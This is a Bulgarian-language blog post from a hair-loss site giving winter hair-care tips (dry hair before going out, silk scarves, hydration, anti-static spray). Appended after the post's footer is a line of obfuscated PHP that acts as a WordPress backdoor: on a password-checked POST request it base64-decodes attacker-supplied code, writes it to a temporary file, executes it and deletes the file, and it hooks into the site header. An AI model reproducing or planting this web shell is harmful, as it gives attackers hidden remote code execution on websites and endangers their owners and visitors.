Важни съвети за грижата за косата през зимата | Косопад

Важни съвети за грижата за косата през зимата

kosa-prez-zima

Ниските температури, вятърът и снегът могат да увредят кожата ни, но малко хора си дават сметка, че студът може да причини същото и на косата ни. Ето няколко полезни съвета, които ще ви помогнат да имате здрава коса в студения сезон:

Винаги излизайте със суха коса

Не само, защото можете да се разболеете. Водата, проникнала вътре в структурата на косъма, замръзва от студа и се разширява. Това уврежда здравината на косъма и го разрушава. Затова, винаги внимателно изсушавайте косата си. Използвайте хидратиращ шампоан и балсам, богат на протеини.

Шаловете са ваши приятели

Един от най- важните аспекти, свързани с грижата за косата през зимата, са дрехите. Качулки, шапки, шалове- използвайте ги винаги. Много често обаче предизвикват статично електричество. За да се справите с проблема, използвайте шал от коприна или сатен, като бариера между косата и шапката, шала или качулката.

kosa-zima-3

Хидратация, хидратация, хидратация

Повечето хора си мислят, че косата е най- суха през лятото. Това обаче не е така. Когато излагате косата на топлина през лятото, кожата диша и мастните жлези отделят секрети, за да поддържат косата хидратирана. През зимата косата ни постоянно е изложена на студ и влага.

Използвайте балсам без плакнене или серум срещу статично електричество, за да сте сигурни, че косъмът е запечатан.

Контрол на статичното електричество

Освен влиянието на дрехите, косата ви може да натрупа статично електричество дори от килима в стаята. Носете си малка бутилка със спрей за коса и си слагайте по малко, когато започне да се трупа статичното електричество. Спреят неутрализира статичното електричество и поддържа косата мека и без да стърчи на всички страни.

Зимните дрехи задълбочават проблема. Може да ги пръскате също със спрея. Друг вариант е да използвате омекотител.

05. януари 2016 16:41:40 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}